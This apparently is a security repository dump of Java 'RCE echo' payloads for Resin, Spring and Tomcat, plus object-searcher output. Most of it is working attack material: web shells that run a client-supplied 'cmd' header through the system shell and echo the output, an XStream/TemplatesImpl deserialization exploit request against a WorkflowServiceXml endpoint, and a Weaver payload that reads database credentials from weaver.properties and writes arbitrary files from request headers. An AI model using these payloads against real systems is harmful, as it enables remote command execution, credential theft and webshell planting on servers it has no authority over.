 * {@code TemplatesImpl} are never built. Runtime indicators are reflective access to
 * {@code Thread.threadLocals}, a request header named {@code cmd}, and the Resin JVM
 * spawning {@code sh -c} or {@code cmd.exe /c}.
 */
9 | public class resinEcho extends AbstractTranslet {
// Empty implementation; present only to satisfy the AbstractTranslet contract.
10 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
11 |
12 | }
13 |
// Empty implementation; present only to satisfy the AbstractTranslet contract.
14 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
15 | }
16 |
/**
 * Finds the Resin {@code HttpRequest} of the current thread in its ThreadLocal storage,
 * runs the {@code cmd} request header through the platform shell and writes the
 * command's stdout into a response created from that request.
 *
 * @throws Exception on any reflection, process or I/O failure
 */
17 | public resinEcho() throws Exception {
// threadLocals is looked up on the superclass of the current thread's class.
18 | Class clazz = Thread.currentThread().getClass();
19 | java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
20 | field.setAccessible(true);
21 | Object obj = field.get(Thread.currentThread());
// obj is now the thread's ThreadLocal map; read its backing entry array.
22 | field = obj.getClass().getDeclaredField("table");
23 | field.setAccessible(true);
24 | obj = field.get(obj);
25 | Object[] obj_arr = (Object[]) obj;
26 | for(int i = 0; i < obj_arr.length; i++) {
27 | Object o = obj_arr[i];
28 | if (o == null) continue;
29 | field = o.getClass().getDeclaredField("value");
30 | field.setAccessible(true);
31 | obj = field.get(o);
// The request object is recognised by its exact class name.
32 | if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
33 | com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
// Untrusted input: client-controlled "cmd" header, handed to a shell without validation.
34 | String cmd = httpRequest.getHeader("cmd");
35 |
36 | if(cmd != null && !cmd.isEmpty()){
// Shell wrapper is chosen from the os.name system property.
37 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"sh", "-c", cmd};
38 |
39 | // String res = new java.util.Scanner(Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next();
// Scanner with the "\\A" delimiter reads the whole stdout stream as a single token.
40 | String res = new Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
41 |
42 | HttpResponse httpResponse = httpRequest.createResponse();
43 |
44 | httpResponse.setHeader("Content-Length", res.length() + "");
// createResponseStream is not public, hence getDeclaredMethod plus setAccessible.
45 | java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
46 | method.setAccessible(true);
47 | com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
48 | httpResponseStream.write(res.getBytes(), 0, res.length());
49 | httpResponseStream.close();
50 | }
51 |
52 | break;
53 | }
54 | }
55 | }
56 |
// Intentionally empty entry point.
57 | public static void main(String[] args) {
58 |
59 | }
60 | }
61 |
62 |
--------------------------------------------------------------------------------
/Resin/code/resinEcho.jsp:
--------------------------------------------------------------------------------
1 | <%@ page contentType="text/html;charset=UTF-8" language="java" %>
2 | <%
// Command-execution web shell for Resin: finds the HttpRequest of the current thread in
// its ThreadLocal storage via reflection, runs the "cmd" request header as an OS command
// and writes its stdout into a response created from that request.
// Defender notes: indicators are reflective access to Thread.threadLocals and the
// ThreadLocal map's "table"/"value" fields, a request header named "cmd", and the Resin
// JVM spawning child processes. On JDK 16 and later this reflective access to java.lang
// internals is refused by default unless the JVM was started with an --add-opens for
// java.lang; keep such flags as narrow as possible.
// threadLocals is looked up on the superclass of the current thread's class.
3 | Class clazz = Thread.currentThread().getClass();
4 | java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals");
5 | field.setAccessible(true);
6 | Object obj = field.get(Thread.currentThread());
7 |
// obj is now the thread's ThreadLocal map; read its backing entry array.
8 | field = obj.getClass().getDeclaredField("table");
9 | field.setAccessible(true);
10 | obj = field.get(obj);
11 |
12 | Object[] obj_arr = (Object[]) obj;
13 | for(int i = 0; i < obj_arr.length; i++) {
14 | Object o = obj_arr[i];
15 | if (o == null) continue;
16 |
// Read the value stored in this ThreadLocal entry.
17 | field = o.getClass().getDeclaredField("value");
18 | field.setAccessible(true);
19 | obj = field.get(o);
20 |
// The request object is recognised by its exact class name.
21 | if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){
22 | com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj;
// Untrusted input: client-controlled "cmd" header, passed to exec() without validation.
23 | String cmd = httpRequest.getHeader("cmd");
24 |
25 | if(cmd != null && !cmd.isEmpty()){
// Scanner with the "\\A" delimiter reads the whole stdout stream as a single token.
26 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
27 | com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse();
28 | httpResponse.setHeader("Content-Length", res.length() + "");
// createResponseStream is not public, hence getDeclaredMethod plus setAccessible.
29 | java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null);
30 | method.setAccessible(true);
31 | com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null);
32 | httpResponseStream.write(res.getBytes(), 0, res.length());
33 | httpResponseStream.close();
34 | }
35 |
36 | break;
37 | }
38 | }
39 | %>
--------------------------------------------------------------------------------
/Resin/code/resinEcho.xml:
--------------------------------------------------------------------------------
1 | POST /services%20/WorkflowServiceXml HTTP/1.1
2 | Host: 127.0.0.1:8080
3 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:89.0) Gecko/20100101 Firefox/89.0
4 | Content-Type: text/xml
5 | cmd: whoami
6 | Content-Length: 6581
7 | Connection: close
8 |
9 |
10 |
11 |
12 |
13 | <java.util.PriorityQueue serialization="custom">
14 | <unserializable-parents/>
15 | <java.util.PriorityQueue>
16 | <default>
17 | <size>2</size>
18 | <comparator class="org.apache.commons.beanutils.BeanComparator">
19 | <property>outputProperties</property>
20 | <comparator class="org.apache.commons.collections.comparators.ComparableComparator"/>
21 | </comparator>
22 | </default>
23 | <int>3</int>
24 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl serialization="custom">
25 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
26 | <default>
27 | <__name>a</__name>
28 | <__bytecodes>
29 | <byte-array>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</byte-array>
30 | </__bytecodes>
31 | <__transletIndex>-1</__transletIndex>
32 | <__indentNumber>0</__indentNumber>
33 | </default>
34 | <boolean>false</boolean>
35 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
36 | </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
37 | <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl reference="../com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"/>
38 | </java.util.PriorityQueue>
39 | </java.util.PriorityQueue>
40 | 2
41 |
42 |
43 |
44 |
--------------------------------------------------------------------------------
/Resin/code/xmlRceWeaver.java:
--------------------------------------------------------------------------------
1 | import com.caucho.server.http.HttpServletRequestImpl;
2 | import com.sun.org.apache.xalan.internal.xsltc.DOM;
3 | import com.sun.org.apache.xalan.internal.xsltc.TransletException;
4 | import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
5 | import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
6 | import com.sun.org.apache.xml.internal.serializer.SerializationHandler;
7 | import sun.misc.BASE64Decoder;
8 |
9 | import java.io.FileOutputStream;
10 | import java.io.PrintWriter;
11 | import java.io.Serializable;
12 | import java.lang.reflect.Method;
13 | import java.nio.file.Files;
14 | import java.nio.file.Paths;
15 | import java.util.Scanner;
16 | import javax.servlet.http.HttpServletResponse;
17 |
18 | public class xmlRceWeaver extends AbstractTranslet implements Serializable {
19 |
/**
 * Prints {@code var1} to the HTTP response belonging to the request that is currently
 * being handled, then flushes and closes the writer.
 *
 * <p>The request is obtained by loading
 * {@code com.caucho.server.dispatch.ServletInvocation} through the thread's context
 * class loader and invoking its {@code getContextRequest} method with a null target
 * (i.e. as a static method); no request or response object is passed in by the caller.
 *
 * <p>Defender note: output produced this way appears in the body of the response to the
 * request that triggered the payload, so unexpected content in responses from the
 * affected endpoint is an indicator.
 *
 * @param var1 text to write to the response
 * @throws Exception on any class-loading, reflection or I/O failure
 */
20 | public void showRespose(String var1) throws Exception {
21 | Class si = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation");
22 | Method getContextRequest = si.getMethod("getContextRequest");
23 | HttpServletRequestImpl req = (HttpServletRequestImpl) getContextRequest.invoke((Object) null);
24 | HttpServletResponse rep = (HttpServletResponse) req.getServletResponse();
25 | PrintWriter out = rep.getWriter();
26 | out.println(var1);
27 | out.flush();
// NOTE(review): the writer is closed on every call - confirm how later calls behave.
28 | out.close();
29 | return;
30 | }
31 |
32 | public xmlRceWeaver() throws Exception {
33 | try {
34 | String Cmdcontext;
35 |
36 | Class ServletInvocation = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.dispatch.ServletInvocation");
37 | Method getContextRequest = ServletInvocation.getMethod("getContextRequest");
38 | HttpServletRequestImpl req = (HttpServletRequestImpl) getContextRequest.invoke((Object) null);
39 |
40 |
41 | //执行系统命令
42 | if (req.getHeader("Session") != null) {
43 | String cmd = req.getHeader("Session");
44 | String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"sh", "-c", cmd};
45 | Cmdcontext = new Scanner(new ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next();
46 | System.err.println("This is an error message.");
47 | this.showRespose(Cmdcontext);
48 | }
49 | //输出jdk 环境变量
50 | if (req.getHeader("Echo") != null) {
51 | String echoinfo = new String(System.getProperties().toString().getBytes());
52 | this.showRespose(echoinfo);
53 | }
54 | // 获取web当前路径
55 | if (req.getHeader("ShowPath") != null) {
56 | String contextPath = Thread.currentThread().getContextClassLoader().getResource("").getPath();
57 | // d:/WEAVER/ecology/classbean/
58 |
59 | Class cls = Thread.currentThread().getContextClassLoader().loadClass("com.caucho.server.http.HttpServletRequestImpl");
60 | String path = cls.getProtectionDomain().getCodeSource().getLocation().getPath();
61 | // D:/WEAVER/Resin/lib/resin.jar
62 |
63 | this.showRespose(path.substring(1));
64 | this.showRespose(contextPath.substring(1));
65 | // 获取数据库路径
66 | if (contextPath.contains("ecology")) {
67 | path = contextPath.substring(1).split("ecology")[0].trim() + "ecology/WEB-INF/prop/weaver.properties";
68 | //读取数据库内容
69 | this.showRespose("\n[+]weaver database path: \n" + path + "\n");
70 | byte[] bytes = Files.readAllBytes(Paths.get(path));
71 | this.showRespose("[+] weaver database success:");
72 | this.showRespose(new String(bytes));
73 | }
74 | }
75 | // header 写webshell
76 | String path = req.getHeader("WPath");
77 | if (path != null & !path.isEmpty()) {
78 | String content = req.getHeader("WContent");
79 | if (content != null && !content.isEmpty()) {
80 | byte[] bytes = (new BASE64Decoder()).decodeBuffer(content);
81 | FileOutputStream fileOutputStream = new FileOutputStream(path);
82 | fileOutputStream.write(bytes);
83 | fileOutputStream.close();
84 | this.showRespose("[+] Write Success");
85 | }
86 | }
87 |
88 | } catch (Exception var6) {
89 | var6.printStackTrace();
90 | }
91 |
92 | }
93 |
94 | @Override
95 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
96 |
97 | }
98 |
99 | /**
100 | * Main transform() method - this is overridden by the compiled translet
101 | *
102 | * @param document
103 | * @param iterator
104 | * @param handler
105 | */
106 | @Override
107 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
108 |
109 | }
110 |
111 | public static void main(String[] args) {
112 |
113 | }
114 | }
115 |
--------------------------------------------------------------------------------
/Resin/img/001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/001.png
--------------------------------------------------------------------------------
/Resin/img/002.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/002.png
--------------------------------------------------------------------------------
/Resin/img/003.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Resin/img/003.png
--------------------------------------------------------------------------------
/Spring/README.md:
--------------------------------------------------------------------------------
1 | # Spring 回显
2 |
3 | ## 依赖
4 | * Spring-web.jar
5 |
6 | ## 效果
7 | 
8 |
9 | ## 参考
10 | * [https://github.com/j1anFen/ysoserial_echo](https://github.com/j1anFen/ysoserial_echo)
11 | * [https://stackoverflow.com/questions/592123/is-there-a-static-way-to-get-the-httpservletrequest-of-the-current-request](https://stackoverflow.com/questions/592123/is-there-a-static-way-to-get-the-httpservletrequest-of-the-current-request)
12 |
--------------------------------------------------------------------------------
/Spring/code/SpringMVCTestController.java:
--------------------------------------------------------------------------------
1 | package com.management.controller;
2 |
3 | import com.management.bean.User;
4 | import org.springframework.stereotype.Controller;
5 | import org.springframework.web.bind.annotation.RequestMapping;
6 | import org.springframework.web.bind.annotation.RequestMethod;
7 | import org.springframework.web.bind.annotation.ResponseBody;
8 | import java.io.*;
9 |
10 | @Controller
11 | public class SpringMVCTestController { // Test controller showing how a response can be reached statically through RequestContextHolder; it is a command-execution endpoint and belongs only in an isolated lab.
12 | // GET /echo: reads the "cmd" request header, runs it with Runtime.exec, prints the process's stdout to the servlet response, then returns a new User.
13 | @ResponseBody
14 | @RequestMapping(value="/echo", method = RequestMethod.GET)
15 | public User Test() throws IOException {
16 | // Obtain the current request and response from RequestContextHolder instead of from method parameters.
17 | org.springframework.web.context.request.RequestAttributes requestAttributes = org.springframework.web.context.request.RequestContextHolder.getRequestAttributes();
18 | javax.servlet.http.HttpServletRequest httprequest = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getRequest();
19 | javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse();
20 | // The client-supplied "cmd" header reaches Runtime.exec with no validation in this method; defenders can look for requests carrying a "cmd" header and for processes spawned by the servlet container.
21 | String cmd = httprequest.getHeader("cmd");
22 | if(cmd != null && !cmd.isEmpty()){
23 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
24 | httpresponse.getWriter().println(res);
25 | }
26 |
27 | return new User();
28 | }
29 | }
30 |
--------------------------------------------------------------------------------
/Spring/code/SpringWebFlowTestController.java:
--------------------------------------------------------------------------------
1 | package com.pizza;
2 |
3 | import org.springframework.stereotype.Controller;
4 | import org.springframework.web.bind.annotation.GetMapping;
5 | import java.io.IOException;
6 |
7 | @Controller
8 | public class SpringWebFlowTestController { // Test controller for reaching the servlet request/response through Spring Web Flow's ExternalContextHolder; /echo is a command-execution endpoint and belongs only in an isolated lab.
9 | // redirectToFlow: GET / returns the view name "redirect:/pizza".
10 | @GetMapping("/")
11 | public String redirectToFlow() {
12 | return "redirect:/pizza";
13 | }
14 | // GET /echo: reads the "cmd" request header, runs it with Runtime.exec, prints the process's stdout to the native servlet response, then returns the view name "test".
15 | @GetMapping("/echo")
16 | public String test() throws IOException {
17 |
18 | // Did not work in the author's own test environment: ExternalContextHolder.getExternalContext() returned null, possibly because the environment was misconfigured.
19 | // Dependency: spring-webflow.jar
20 | // References:
21 | // 1. https://www.00theway.org/2020/01/04/apereo-cas-rce/
22 | // 2. https://www.programcreek.com/java-api-examples/?class=org.springframework.webflow.context.ExternalContextHolder&method=getExternalContext
23 | // NOTE(review): when getExternalContext() returns null, as described above, the getNativeRequest() call below throws NullPointerException.
24 | org.springframework.webflow.context.servlet.ServletExternalContext servletExternalContext = (org.springframework.webflow.context.servlet.ServletExternalContext) org.springframework.webflow.context.ExternalContextHolder.getExternalContext();
25 | javax.servlet.http.HttpServletRequest request = (javax.servlet.http.HttpServletRequest) servletExternalContext.getNativeRequest();
26 | javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse();
27 | // The client-supplied "cmd" header reaches Runtime.exec with no validation in this method; defenders can look for requests carrying a "cmd" header and for processes spawned by the servlet container.
28 | String cmd = request.getHeader("cmd");
29 | if(cmd != null && !cmd.isEmpty()){
30 | String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next();
31 | response.getWriter().println(res);
32 | }
33 |
34 | return "test";
35 | }
36 | }
37 |
--------------------------------------------------------------------------------
/Spring/imgs/20200621-001.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jas502n/Java-Rce-Echo/ceb0436cc9ff30c350c854f5edeff9b42ba45fda/Spring/imgs/20200621-001.png
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomat 6.0.53 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {java.lang.Thread}
9 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
10 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
11 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
12 | ---> global = {org.apache.coyote.RequestGroupInfo}
13 |
14 |
15 | TargetObject = {java.lang.Thread}
16 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
17 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
18 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
19 | ---> global = {org.apache.coyote.RequestGroupInfo}
20 | ---> processors = {class java.util.ArrayList}
21 | ---> [0] = {org.apache.coyote.RequestInfo}
22 |
23 |
24 | TargetObject = {java.lang.Thread}
25 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
26 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
27 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
28 | ---> global = {org.apache.coyote.RequestGroupInfo}
29 | ---> processors = {class java.util.ArrayList}
30 | ---> [0] = {org.apache.coyote.RequestInfo}
31 | ---> req = {org.apache.coyote.Request}
32 |
33 |
34 | TargetObject = {java.lang.Thread}
35 | ---> group = {java.lang.ThreadGroup}
36 | ---> threads = {class [Ljava.lang.Thread;}
37 | ---> [6] = {org.apache.tomcat.util.threads.ThreadWithAttributes}
38 | ---> target = {org.apache.tomcat.util.threads.ThreadPool$ControlRunnable}
39 | ---> toRun = {org.apache.jk.common.ChannelSocket$SocketAcceptor}
40 | ---> wajp = {org.apache.jk.common.ChannelSocket}
41 | ---> global = {org.apache.coyote.RequestGroupInfo}
42 |
43 |
44 | TargetObject = {java.lang.Thread}
45 | ---> group = {java.lang.ThreadGroup}
46 | ---> threads = {class [Ljava.lang.Thread;}
47 | ---> [6] = {org.apache.tomcat.util.threads.ThreadWithAttributes}
48 | ---> target = {org.apache.tomcat.util.threads.ThreadPool$ControlRunnable}
49 | ---> toRun = {org.apache.jk.common.ChannelSocket$SocketAcceptor}
50 | ---> wajp = {org.apache.jk.common.ChannelSocket}
51 | ---> next = {org.apache.jk.common.HandlerRequest}
52 |
53 |
54 | TargetObject = {java.lang.Thread}
55 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
56 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
57 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
58 | ---> global = {org.apache.coyote.RequestGroupInfo}
59 | ---> processors = {class java.util.ArrayList}
60 | ---> [0] = {org.apache.coyote.RequestInfo}
61 | ---> req = {org.apache.coyote.Request}
62 | ---> notes = {class [Ljava.lang.Object;}
63 | ---> [1] = {org.apache.catalina.connector.Request}
64 |
65 |
66 | TargetObject = {java.lang.Thread}
67 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Worker}
68 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
69 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
70 | ---> global = {org.apache.coyote.RequestGroupInfo}
71 | ---> processors = {class java.util.ArrayList}
72 | ---> [0] = {org.apache.coyote.RequestInfo}
73 | ---> req = {org.apache.coyote.Request}
74 | ---> notes = {class [Ljava.lang.Object;}
75 | ---> [1] = {org.apache.catalina.connector.Request}
76 | ---> facade = {org.apache.catalina.connector.RequestFacade}
77 |
78 |
79 |
--------------------------------------------------------------------------------
/Tomcat/Java Object Searcher search result/tomcat 7.0.34 result.txt:
--------------------------------------------------------------------------------
1 | #############################################################
2 | Java Object Searcher v0.01
3 | author: c0ny1
4 | github: http://github.com/c0ny1/java-object-searcher
5 | #############################################################
6 |
7 |
8 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
9 | ---> group = {java.lang.ThreadGroup}
10 | ---> threads = {class [Ljava.lang.Thread;}
11 | ---> [3] = {java.lang.Thread}
12 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
13 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
14 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
15 | ---> global = {org.apache.coyote.RequestGroupInfo}
16 |
17 |
18 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
19 | ---> group = {java.lang.ThreadGroup}
20 | ---> threads = {class [Ljava.lang.Thread;}
21 | ---> [5] = {java.lang.Thread}
22 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
23 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
24 | ---> handler = {org.apache.coyote.ajp.AjpProtocol$AjpConnectionHandler}
25 | ---> global = {org.apache.coyote.RequestGroupInfo}
26 |
27 |
28 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
29 | ---> group = {java.lang.ThreadGroup}
30 | ---> threads = {class [Ljava.lang.Thread;}
31 | ---> [3] = {java.lang.Thread}
32 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
33 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
34 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
35 | ---> global = {org.apache.coyote.RequestGroupInfo}
36 | ---> processors = {java.util.ArrayList}
37 | ---> [0] = {org.apache.coyote.RequestInfo}
38 |
39 |
40 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
41 | ---> group = {java.lang.ThreadGroup}
42 | ---> threads = {class [Ljava.lang.Thread;}
43 | ---> [2] = {java.lang.Thread}
44 | ---> target = {org.apache.catalina.core.ContainerBase$ContainerBackgroundProcessor}
45 | ---> this$0 = {org.apache.catalina.core.StandardEngine}
46 | ---> children = {java.util.HashMap}
47 | ---> [localhost] = {org.apache.catalina.core.StandardHost}
48 | ---> pipeline = {org.apache.catalina.core.StandardPipeline}
49 | ---> first = {org.apache.catalina.valves.AccessLogValve}
50 | ---> logElements = {class [Lorg.apache.catalina.valves.AccessLogValve$AccessLogElement;}
51 | ---> [9] = {org.apache.catalina.valves.AccessLogValve$RequestElement}
52 |
53 |
54 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
55 | ---> group = {java.lang.ThreadGroup}
56 | ---> threads = {class [Ljava.lang.Thread;}
57 | ---> [3] = {java.lang.Thread}
58 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
59 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
60 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
61 | ---> global = {org.apache.coyote.RequestGroupInfo}
62 | ---> processors = {java.util.ArrayList}
63 | ---> [0] = {org.apache.coyote.RequestInfo}
64 | ---> req = {org.apache.coyote.Request}
65 |
66 |
67 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
68 | ---> group = {java.lang.ThreadGroup}
69 | ---> threads = {class [Ljava.lang.Thread;}
70 | ---> [3] = {java.lang.Thread}
71 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
72 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
73 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
74 | ---> global = {org.apache.coyote.RequestGroupInfo}
75 | ---> processors = {java.util.ArrayList}
76 | ---> [0] = {org.apache.coyote.RequestInfo}
77 | ---> req = {org.apache.coyote.Request}
78 | ---> notes = {class [Ljava.lang.Object;}
79 | ---> [1] = {org.apache.catalina.connector.Request}
80 |
81 |
82 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
83 | ---> group = {java.lang.ThreadGroup}
84 | ---> threads = {class [Ljava.lang.Thread;}
85 | ---> [3] = {java.lang.Thread}
86 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
87 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
88 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
89 | ---> global = {org.apache.coyote.RequestGroupInfo}
90 | ---> processors = {java.util.ArrayList}
91 | ---> [0] = {org.apache.coyote.RequestInfo}
92 | ---> req = {org.apache.coyote.Request}
93 | ---> notes = {class [Ljava.lang.Object;}
94 | ---> [1] = {org.apache.catalina.connector.Request}
95 | ---> facade = {org.apache.catalina.connector.RequestFacade}
96 |
97 |
98 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
99 | ---> group = {java.lang.ThreadGroup}
100 | ---> threads = {class [Ljava.lang.Thread;}
101 | ---> [3] = {java.lang.Thread}
102 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
103 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
104 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
105 | ---> global = {org.apache.coyote.RequestGroupInfo}
106 | ---> processors = {java.util.ArrayList}
107 | ---> [0] = {org.apache.coyote.RequestInfo}
108 | ---> req = {org.apache.coyote.Request}
109 | ---> notes = {class [Ljava.lang.Object;}
110 | ---> [1] = {org.apache.catalina.connector.Request}
111 | ---> specialAttributes = {java.util.Map}
112 | ---> [org.apache.catalina.core.DISPATCHER_TYPE] = {org.apache.catalina.connector.Request$1}
113 |
114 |
115 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
116 | ---> group = {java.lang.ThreadGroup}
117 | ---> threads = {class [Ljava.lang.Thread;}
118 | ---> [3] = {java.lang.Thread}
119 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
120 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
121 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
122 | ---> global = {org.apache.coyote.RequestGroupInfo}
123 | ---> processors = {java.util.ArrayList}
124 | ---> [0] = {org.apache.coyote.RequestInfo}
125 | ---> req = {org.apache.coyote.Request}
126 | ---> notes = {class [Ljava.lang.Object;}
127 | ---> [1] = {org.apache.catalina.connector.Request}
128 | ---> specialAttributes = {java.util.Map}
129 | ---> [org.apache.catalina.ASYNC_SUPPORTED] = {org.apache.catalina.connector.Request$3}
130 |
131 |
132 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
133 | ---> group = {java.lang.ThreadGroup}
134 | ---> threads = {class [Ljava.lang.Thread;}
135 | ---> [3] = {java.lang.Thread}
136 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
137 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
138 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
139 | ---> global = {org.apache.coyote.RequestGroupInfo}
140 | ---> processors = {java.util.ArrayList}
141 | ---> [0] = {org.apache.coyote.RequestInfo}
142 | ---> req = {org.apache.coyote.Request}
143 | ---> notes = {class [Ljava.lang.Object;}
144 | ---> [1] = {org.apache.catalina.connector.Request}
145 | ---> specialAttributes = {java.util.Map}
146 | ---> [org.apache.catalina.parameter_parse_failed] = {org.apache.catalina.connector.Request$5}
147 |
148 |
149 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
150 | ---> group = {java.lang.ThreadGroup}
151 | ---> threads = {class [Ljava.lang.Thread;}
152 | ---> [3] = {java.lang.Thread}
153 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
154 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
155 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
156 | ---> global = {org.apache.coyote.RequestGroupInfo}
157 | ---> processors = {java.util.ArrayList}
158 | ---> [0] = {org.apache.coyote.RequestInfo}
159 | ---> req = {org.apache.coyote.Request}
160 | ---> notes = {class [Ljava.lang.Object;}
161 | ---> [1] = {org.apache.catalina.connector.Request}
162 | ---> specialAttributes = {java.util.Map}
163 | ---> [org.apache.catalina.core.DISPATCHER_REQUEST_PATH] = {org.apache.catalina.connector.Request$2}
164 |
165 |
166 | TargetObject = {org.apache.tomcat.util.threads.TaskThread}
167 | ---> group = {java.lang.ThreadGroup}
168 | ---> threads = {class [Ljava.lang.Thread;}
169 | ---> [3] = {java.lang.Thread}
170 | ---> target = {org.apache.tomcat.util.net.JIoEndpoint$Acceptor}
171 | ---> this$0 = {org.apache.tomcat.util.net.JIoEndpoint}
172 | ---> handler = {org.apache.coyote.http11.Http11Protocol$Http11ConnectionHandler}
